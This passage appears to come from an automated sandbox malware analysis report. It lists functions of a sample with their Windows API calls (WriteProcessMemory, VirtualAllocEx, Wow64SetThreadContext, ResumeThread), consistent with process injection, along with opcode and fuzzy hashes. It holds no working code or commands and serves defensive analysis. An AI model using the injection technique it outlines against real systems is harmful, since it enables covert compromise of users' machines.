                                                                                                                                        • Instruction Fuzzy Hash: 5B2137B59003199FDB10CFA9C885BEEBBF4FF48360F10842AE959A7251C7789544CFA0
                                                                                                                                        Function 07307720 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 808 7307720-730776e 810 7307770-730777c 808->810 811 730777e-73077bd WriteProcessMemory 808->811 810->811 813 73077c6-73077f6 811->813 814 73077bf-73077c5 811->814 814->813
                                                                                                                                        APIs
                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073077B0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                        • Opcode ID: 3a5bba1b3a882860a6e0b35667d80a1498cd625db06e15d86c995e67d8e606c9
                                                                                                                                        • Instruction ID: 47355b88fb0a5d1c582df4e633c03e0f0a597afd93533af79db2918ad3cc85c0
                                                                                                                                        • Opcode Fuzzy Hash: 3a5bba1b3a882860a6e0b35667d80a1498cd625db06e15d86c995e67d8e606c9
                                                                                                                                        • Instruction Fuzzy Hash: 8C2126B59003599FDB10DFA9C885BEEBBF5FF48360F108429E958A7250C778A944CBA4
                                                                                                                                        Function 07E43F97 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07E43F7D,?,?), ref: 07E4402F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DrawText
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2175133113-0
                                                                                                                                        • Opcode ID: aba4a4e7703f174d97bc2883adf015e64927971349d61b42400710ca3188ba1a
                                                                                                                                        • Instruction ID: b40726621134b0e12be869e334861617033e894a0ef9bdf277f08f443ca9edea
                                                                                                                                        • Opcode Fuzzy Hash: aba4a4e7703f174d97bc2883adf015e64927971349d61b42400710ca3188ba1a
                                                                                                                                        • Instruction Fuzzy Hash: 4F21EEB5D0120A9FCB10CF9AD884ADEBBF5BB48324F14842AE818A7210D374A940CFA0
                                                                                                                                        Function 07307580 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 818 7307580-73075d3 821 73075e3-7307613 Wow64SetThreadContext 818->821 822 73075d5-73075e1 818->822 824 7307615-730761b 821->824 825 730761c-730764c 821->825 822->821 824->825
                                                                                                                                        APIs
                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07307606
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                        • Opcode ID: 006e0d1a0e4ac242976d8062efdc41c828dc5bdbcb4e318c56f6d1068bfb707e
                                                                                                                                        • Instruction ID: 8658d6f9a87546cadaf7a6bab7f4b16f8eac74e1e4e8b234833818cc989b2343
                                                                                                                                        • Opcode Fuzzy Hash: 006e0d1a0e4ac242976d8062efdc41c828dc5bdbcb4e318c56f6d1068bfb707e
                                                                                                                                        • Instruction Fuzzy Hash: 3A2137B5D003099FDB10DFAAC485BEEBBF4EF48324F54842AD459A7241CB78A944CFA4
                                                                                                                                        Function 07307809 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 829 7307809-730789d ReadProcessMemory 833 73078a6-73078d6 829->833 834 730789f-73078a5 829->834 834->833
                                                                                                                                        APIs
                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07307890
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                        • Opcode ID: 420096160a40b7c7dd4bc7f83b89990fc8418eeeaf7334517485f7c3c3c0a7e3
                                                                                                                                        • Instruction ID: 3bb75567627f05b0c30b6efaee64ff71b05e90343018721db7302d0ca077f5c1
                                                                                                                                        • Opcode Fuzzy Hash: 420096160a40b7c7dd4bc7f83b89990fc8418eeeaf7334517485f7c3c3c0a7e3
                                                                                                                                        • Instruction Fuzzy Hash: 012139B1D00359DFDB10DFAAC881AEEBBF4FF48320F10882AE958A7250C7359540CBA4
                                                                                                                                        Function 0305D2FC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0305D6D6,?,?,?,?,?), ref: 0305D797
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1697354167.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3050000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                        • Opcode ID: b009c642f0b701826d03850ee478347fb132a436086fe9f113f422000ddec079
                                                                                                                                        • Instruction ID: 19d913d84df8ed1ff6942085591484ff2ef16cf56a7061b5d82dd8b9a183d888
                                                                                                                                        • Opcode Fuzzy Hash: b009c642f0b701826d03850ee478347fb132a436086fe9f113f422000ddec079
                                                                                                                                        • Instruction Fuzzy Hash: 9421E3B5901248DFDB10CFAAD584ADEFBF4EB48320F14841AE918A7310D374A950CFA4
                                                                                                                                        Function 0305D709 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0305D6D6,?,?,?,?,?), ref: 0305D797
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1697354167.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3050000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                        • Opcode ID: 4fde8b961d7541e1ec4bfa673589e933e1565381de4b6c328239d759a718a366
                                                                                                                                        • Instruction ID: fea6305ad9c5fd4c251f720ed7bce857c72e5fc81740076ca2cc28b18fd44292
                                                                                                                                        • Opcode Fuzzy Hash: 4fde8b961d7541e1ec4bfa673589e933e1565381de4b6c328239d759a718a366
                                                                                                                                        • Instruction Fuzzy Hash: F021D2B59012199FDB10CFAAD584ADEBBF8EB48324F14841AE918A3311D374A940CFA4
                                                                                                                                        Function 07307588 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07307606
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                        • Opcode ID: 4db23e856feedc9cee3fe578b5fe425b55a2f1a7d3b11ee9897d8b768a2a1815
                                                                                                                                        • Instruction ID: e5109dc500c55b6fc24a1a553153829067e003cd5f39c8dec30a676b9ee2d8d5
                                                                                                                                        • Opcode Fuzzy Hash: 4db23e856feedc9cee3fe578b5fe425b55a2f1a7d3b11ee9897d8b768a2a1815
                                                                                                                                        • Instruction Fuzzy Hash: BA2127B5D003098FDB10DFAAC4857EEBBF4EF48324F54842AD459A7241CB78A944CFA4
                                                                                                                                        Function 07307810 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07307890
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                        • Opcode ID: 3984b58d4990d92634a35d1777688da45f45567dcaa4b487f5213c5ee452b7a4
                                                                                                                                        • Instruction ID: 09a4fbeb9674055617bd60190adddf998fe876eafe21ea9f0e11ad945519a172
                                                                                                                                        • Opcode Fuzzy Hash: 3984b58d4990d92634a35d1777688da45f45567dcaa4b487f5213c5ee452b7a4
                                                                                                                                        • Instruction Fuzzy Hash: 372128B1D003599FDB10DFAAC881ADEBBF5FF48320F108829E558A7250D778A544CBA4
                                                                                                                                        Function 07307658 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073076CE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 4304519b7ecc566b2d6fbbd8f106069ccef9ffb2278f0d6808041aabaa768805
                                                                                                                                        • Instruction ID: 459ba731eb9ade3c79a8df7b44096f06aa70e5d63c6e5a7b05098fd6c9f3a04f
                                                                                                                                        • Opcode Fuzzy Hash: 4304519b7ecc566b2d6fbbd8f106069ccef9ffb2278f0d6808041aabaa768805
                                                                                                                                        • Instruction Fuzzy Hash: F72147B58002499FCB10DFAAC845BDEBFF5EB48320F108819E559A7260C775A940CFA5
                                                                                                                                        Function 07307660 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073076CE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 42689d6036141c8081c1245a7e9b117864e1d7d2e24771b9b5093f236c626d9f
                                                                                                                                        • Instruction ID: 7eaf4582f2a1dcfc95ca2c409b63d7307c2978c76a2a905fbe9ae6b95540e67c
                                                                                                                                        • Opcode Fuzzy Hash: 42689d6036141c8081c1245a7e9b117864e1d7d2e24771b9b5093f236c626d9f
                                                                                                                                        • Instruction Fuzzy Hash: 8A1137B5900249DFDB10DFAAC844BDEBFF5EF48320F108819E559A7250C775A944CFA4
                                                                                                                                        Function 07307098 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ResumeThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                        • Opcode ID: 61d15a454dcebf98834be37483688bbb41486efa249baa3f59f02907d48831ac
                                                                                                                                        • Instruction ID: 7602a57129eb981e5502826e091115afef375f032bf889f9b056d6344f07ce90
                                                                                                                                        • Opcode Fuzzy Hash: 61d15a454dcebf98834be37483688bbb41486efa249baa3f59f02907d48831ac
                                                                                                                                        • Instruction Fuzzy Hash: D81158B19002498FDB20DFAAC4457DEFFF9EB89320F24881AD459A7250CB74A544CFA4
                                                                                                                                        Function 07309CC8 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07309D2D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                        • Opcode ID: b49953e43905772d8818aa02260de396bc069b86f5329caf2bc7b1bf3749a17c
                                                                                                                                        • Instruction ID: 9fe57c9ebddef45046c3fea06c35cc7789c65d6b6ef46b041125c1060cfc66d9
                                                                                                                                        • Opcode Fuzzy Hash: b49953e43905772d8818aa02260de396bc069b86f5329caf2bc7b1bf3749a17c
                                                                                                                                        • Instruction Fuzzy Hash: 1611E3B5800249DFDB10DF99D549BDEFBF8EB48320F108819E558A7650C375A544CFA5
                                                                                                                                        Function 073070A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ResumeThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                        • Opcode ID: 8911e727df77270afd3aefc5d931d5a876f4753345ee926927c19f864702a33f
                                                                                                                                        • Instruction ID: b4a5cf4dfd3fe7f0fc086bb45f6f94d52e062a71124c9b4a8b9f69cc43509179
                                                                                                                                        • Opcode Fuzzy Hash: 8911e727df77270afd3aefc5d931d5a876f4753345ee926927c19f864702a33f
                                                                                                                                        • Instruction Fuzzy Hash: FC113AB1D003498FDB14DFAAC4457DEFBF4EB88324F208819D559A7250C775A544CFA4
                                                                                                                                        Function 0305B018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0305B07E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1697354167.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3050000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                        • Opcode ID: 7e0186d5f39fda8f5c843e4499bb430afff446491399d4deb8265092e93c0593
                                                                                                                                        • Instruction ID: 5056a8b992974d6585b21ca4904f61fe4de05931db4cce1800916364208cd408
                                                                                                                                        • Opcode Fuzzy Hash: 7e0186d5f39fda8f5c843e4499bb430afff446491399d4deb8265092e93c0593
                                                                                                                                        • Instruction Fuzzy Hash: 3911D2B6C052498FCB10DF9AD444ADFFBF4EB48224F14841AD869A7210D379A545CFA5
                                                                                                                                        Function 07304268 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07309D2D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                        • Opcode ID: 0005d5b55bfd9ae9563d16c0ce71ffc4b3fac90d3438588287bf4a330f3b601d
                                                                                                                                        • Instruction ID: b442c9fcf4474cede6b5686b444e7a6a5a96dcc2e11023f66f2b8ad88c04b0ce
                                                                                                                                        • Opcode Fuzzy Hash: 0005d5b55bfd9ae9563d16c0ce71ffc4b3fac90d3438588287bf4a330f3b601d
                                                                                                                                        • Instruction Fuzzy Hash: 8411F2B5800349DFDB10DF9AD588BDEFBF8EB48320F108419E958A7641C375A944CFA5
                                                                                                                                        Function 0192D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696937234.000000000192D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0192D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_192d000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 77683c67dccc4482f098e86dc7dddbd7cee9d87803b0788ff44c1aba23ada46b
                                                                                                                                        • Instruction ID: 5ce94c744fd7b07f0eacea92fbde9f5bc8fe6a61d6c65b2e9895f7a8dcb52c7b
                                                                                                                                        • Opcode Fuzzy Hash: 77683c67dccc4482f098e86dc7dddbd7cee9d87803b0788ff44c1aba23ada46b
                                                                                                                                        • Instruction Fuzzy Hash: 36214571504200DFDB05DF48C9C0F66BFA9FB88724F20C569E90D4B29AC336E446CBA1
                                                                                                                                        Function 0193D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696998882.000000000193D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0193D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_193d000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e154a4ef3777b09a49b84f49dd8deb7a52bacd5605b20fd0fd6165c2383b4f79
                                                                                                                                        • Instruction ID: 2adac664c49d38d29fba29d0bc0ea0a8e72fb5dad660d1428953615ba282915d
                                                                                                                                        • Opcode Fuzzy Hash: e154a4ef3777b09a49b84f49dd8deb7a52bacd5605b20fd0fd6165c2383b4f79
                                                                                                                                        • Instruction Fuzzy Hash: 2A21F271504200EFDB05DF98D9D0F26BBA5FBC4324F60CA6DE94D4B256C736D846CA61
                                                                                                                                        Function 0193D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696998882.000000000193D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0193D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_193d000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 61e9aa35dbdb587c67fa17c03347d2ce2b8969c79614badc8917b2a9f46e0c18
                                                                                                                                        • Instruction ID: fe83f5132737ea4fcbfdccaeec36f3a5eca8d27813f89f7872c17e9bcca03c78
                                                                                                                                        • Opcode Fuzzy Hash: 61e9aa35dbdb587c67fa17c03347d2ce2b8969c79614badc8917b2a9f46e0c18
                                                                                                                                        • Instruction Fuzzy Hash: 34213070604200DFCB11DF68D990B26FBA9EBC4B14F60C969E80E4B256C33AC406CA61
                                                                                                                                        Function 0193D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696998882.000000000193D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0193D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_193d000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 94c5a0aa26daa9a4853e9d2c601b94dc6a1cbb40b2663d899502f73fb41fe2b4
                                                                                                                                        • Instruction ID: 27cf2b61608a66e1f705b6a4d6059bcc4e44b3129a303087e98a65cb307fb599
                                                                                                                                        • Opcode Fuzzy Hash: 94c5a0aa26daa9a4853e9d2c601b94dc6a1cbb40b2663d899502f73fb41fe2b4
                                                                                                                                        • Instruction Fuzzy Hash: 4A2183755093808FD703CF64D594715BFB1EB46214F28C5EAD8498F2A7C33A980ACB62
                                                                                                                                        Function 0192D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696937234.000000000192D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0192D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_192d000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                        • Instruction ID: fdda0680235dadaeea20f26afa679b1c1b226fdd4a942ddefe15944797d26fd0
                                                                                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                        • Instruction Fuzzy Hash: 2A110372404280CFDB02CF44D9C4B56BFB2FB94324F24C2A9D9090B25BC33AE45ACBA1
                                                                                                                                        Function 0193D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696998882.000000000193D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0193D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_193d000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                        • Instruction ID: bc71ff068633d74a2f20a5ee540ed36028ea512586647ac3fa5c1bdf9e871cad
                                                                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                        • Instruction Fuzzy Hash: 7A11BB75504280DFDB02CF54C5D4B15BFA1FB84224F24C6AAD8494B296C33AD80ACB62
                                                                                                                                        Function 0192D745 Relevance: .0, Instructions: 45COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696937234.000000000192D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0192D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_192d000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c15324f7408fa85d98ea34f391a208bf1aa34d62d5265f749159603d1f27310b
                                                                                                                                        • Instruction ID: dc916cbf457b0422587d1e861a5599827411a444c8a6cf4d78876205411aeff8
                                                                                                                                        • Opcode Fuzzy Hash: c15324f7408fa85d98ea34f391a208bf1aa34d62d5265f749159603d1f27310b
                                                                                                                                        • Instruction Fuzzy Hash: DD01F7B10083909AF7108E69CD84B67BFDCDF41325F08C92AED0C4A28AC27DD840C6B1
                                                                                                                                        Function 0192D744 Relevance: .0, Instructions: 36COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696937234.000000000192D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0192D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_192d000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 39aaef9f5b3c8ba2eb479d2c3da55abb7ee482422fd1cc157f0c765ebf27effe
                                                                                                                                        • Instruction ID: 19b6a80a38d1da0c3fd945811caa9233b0ae2bdcd8b3d604f2e3a5a77b9efd07
                                                                                                                                        • Opcode Fuzzy Hash: 39aaef9f5b3c8ba2eb479d2c3da55abb7ee482422fd1cc157f0c765ebf27effe
                                                                                                                                        • Instruction Fuzzy Hash: D3F062714083949AF7118E1AC8C8B66FFECEB81735F18C45AED4C5E28AC2799844CAB1

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 07E4AA4F Relevance: 4.0, Strings: 3, Instructions: 253COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: TJpq$Tekq$xbnq
                                                                                                                                        • API String ID: 0-3321955333
                                                                                                                                        • Opcode ID: d3d0d35de6df444ce53ab70fe66b96dac9a43bfb2b1e57124ded479a5d0ee121
                                                                                                                                        • Instruction ID: 95244354d1bf3fa7cb4cd1259c93ced4413595e8bf46156d373b33ccdcaf6805
                                                                                                                                        • Opcode Fuzzy Hash: d3d0d35de6df444ce53ab70fe66b96dac9a43bfb2b1e57124ded479a5d0ee121
                                                                                                                                        • Instruction Fuzzy Hash: 79C172B5E016188FDB58CF6AD9446DDBBF2BF88301F14C1A9D809AB364DB349E858F50
                                                                                                                                        Function 07307150 Relevance: 2.8, Strings: 2, Instructions: 312COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
